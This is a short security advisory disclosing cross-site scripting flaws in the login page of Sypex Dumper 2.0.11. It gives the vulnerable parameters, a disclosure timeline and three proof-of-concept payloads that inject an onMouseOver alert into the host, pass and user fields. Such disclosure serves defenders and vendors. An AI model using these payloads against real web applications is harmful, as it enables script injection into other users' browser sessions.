Credits: John Page ( hyp3rlinx ) Domains: hyp3rlinx.altervista.org Source: http://hyp3rlinx.altervista.org/advisories/AS-SYPEX0529.txt Vendor: https://sypex.net Product: Sypex Dumper 2.0.11 is a PHP web based MySQL database management system. Advisory Information: ================================================ Sypex Dumper 2.0.11 XSS Vulnerabilities XSS Vulnerability Details: ===================== Login page input fields are vulnerable to XSS via POST method. Allowing remote attackers to execute arbitrary code in the context of an user's browser session. Exploit code(s): =============== host="onMouseOver="alert(666); pass="onMouseOver="alert(666); user="onMouseOver="alert(666); Disclosure Timeline: ========================================================= Vendor Notification: May 27, 2015 May 29, 2015: Public Disclosure Severity Level: ========================================================= Med Description: ========================================================== Request Method(s): [+] POST Vulnerable Product: [+] Sypex Dumper 2.0.11 Vulnerable Parameter(s): [+] host, pass, user Affected Area(s): [+] Login page =============================================================== (hyp3rlinx) # Iranian Exploit DataBase = http://IeDb.Ir [2015-06-12]